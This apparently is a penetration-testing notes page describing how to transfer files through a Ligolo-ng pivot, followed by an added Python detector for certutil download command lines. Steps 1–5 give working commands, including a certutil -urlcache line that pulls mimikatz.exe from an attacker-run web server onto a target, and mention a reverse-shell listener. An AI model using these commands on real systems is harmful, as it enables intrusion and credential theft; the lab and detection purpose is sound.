Zero Day Archives

Transferring Files through Pivot

Here’s how you can set up another listener on a different port to forward traffic to a web server, and then use it to transfer files through a pivot:


Step 1: Create Another Listener for Port 80

Add a second listener on the pivot machine, dedicated to web traffic. It will forward to your Python3 web server on port 80.

  1. Listener Add Command:

    listener_add --addr 0.0.0.0:1235 --to 127.0.0.1:80

    • This command tells the pivot machine to listen for incoming traffic on port 1235 and forward it to 127.0.0.1:80, which is port 80 on the machine running the Ligolo-ng proxy (your Kali machine).

    • This second listener acts as a proxy for HTTP traffic to your web server.


Step 2: Verify Both Listeners Are Active

You should now have two listeners running on the pivot machine:

  • One listener on port 2222 for the reverse shell.

  • Another listener on port 1235 for your web server (port 80).

You can check active listeners with:

  1. Check Active Listeners:

    listener_list

    This will show both listeners with the ports and their respective forwarding configuration.


Step 3: Set Up a Python Web Server on Port 80

On your Kali machine (or the machine where you want to serve files), you can run a Python3 HTTP server on port 80. This is where files like mimikatz.exe or WinPeas.exe can be served.

  1. Start a Python3 HTTP Server on Port 80:

    python3 -m http.server 80

    This will serve files from the directory you run the command in on port 80.


Step 4: Transfer Files Using Certutil

Now that you have your second listener set up and your web server running, you can use the certutil tool on the target machine to download files through the pivot.

  1. Transfer File from the Web Server: On the target machine, use the following command to download a file (e.g., mimikatz.exe) from your Python HTTP server:

    certutil -urlcache -f http://10.129.229.129:1235/mimikatz.exe mimikatz.exe

    • 10.129.229.129 is the IP address of your pivot machine.

    • 1235 is the port on which your second listener accepts traffic and forwards it to port 80.

    • mimikatz.exe is the file you want to download and save on the target machine.

    This command connects to the pivot machine on port 1235. The listener forwards the traffic to port 80 on your Kali machine, where your Python HTTP server is serving mimikatz.exe.


Step 5: Verify the File Transfer

After running the above command, mimikatz.exe (or any other file you choose to serve) will be transferred to the target machine.

  • You can transfer other tools, such as winPEAS, in the same way by changing the file name in the command.
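
From the defender's side, the Step 4 download leaves a distinctive process-creation command line. The following is an added example, not part of the original page: it flags certutil URL-cache downloads in constructed log lines and raises severity when the source is a private IP literal on a non-standard port, the pattern produced by the pivot listener above. The sample events, host names and severity labels are assumptions.

```python
import ipaddress
import re
import shlex
from urllib.parse import urlsplit
# Constructed process-creation command lines (Sysmon Event ID 1 / Security 4688 style).
SAMPLE_EVENTS = [
    ("WS01", r"certutil -urlcache -f http://10.129.229.129:1235/mimikatz.exe mimikatz.exe"),
    ("WS02", r'"C:\Windows\System32\certutil.exe" /URLCache /split /f http://10.0.5.7:8000/a.bin a.bin'),
    ("WS03", r"certutil -hashfile C:\Users\bob\setup.msi SHA256"),
    ("WS04", r"certutil.exe -urlcache -f https://updates.example.com/root.crl root.crl"),
]
COMMON_PORTS = {80, 443}

def analyze(cmdline):
    """Return a finding dict if cmdline is a certutil URL-cache download, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keeps backslashes in Windows paths
    except ValueError:
        argv = cmdline.split()                    # unbalanced quotes: fall back
    argv = [a.strip('"') for a in argv]
    if not argv or not re.search(r"(^|[\\/])certutil(\.exe)?$", argv[0], re.I):
        return None
    # certutil accepts both -flag and /flag, case-insensitively.
    flags = {a[1:].lower() for a in argv[1:] if a[:1] in ("-", "/")}
    urls = [a for a in argv[1:] if re.match(r"(?i)https?://", a)]
    if "urlcache" not in flags or not urls:
        return None
    u = urlsplit(urls[0])
    try:
        port = u.port or (443 if u.scheme == "https" else 80)
    except ValueError:
        port = -1  # malformed port; still reported as non-standard
    try:
        internal = ipaddress.ip_address(u.hostname).is_private
    except ValueError:
        internal = False  # a DNS name (or missing host), not an IP literal
    reasons = ["certutil -urlcache download"]
    if internal:
        reasons.append("source is a private IP literal")
    if port not in COMMON_PORTS:
        reasons.append(f"non-standard port {port}")
    severity = "high" if internal and port not in COMMON_PORTS else "medium"
    return {"url": urls[0], "port": port, "severity": severity, "reasons": reasons}

def scan(events):
    return [(host, f) for host, cmd in events if (f := analyze(cmd))]

if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(host, finding["severity"], finding["url"], "; ".join(finding["reasons"]))
```

The same match can be expressed as a SIEM rule on the process command line; the Python form makes the flag and URL parsing explicit.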



Last updated 2 months ago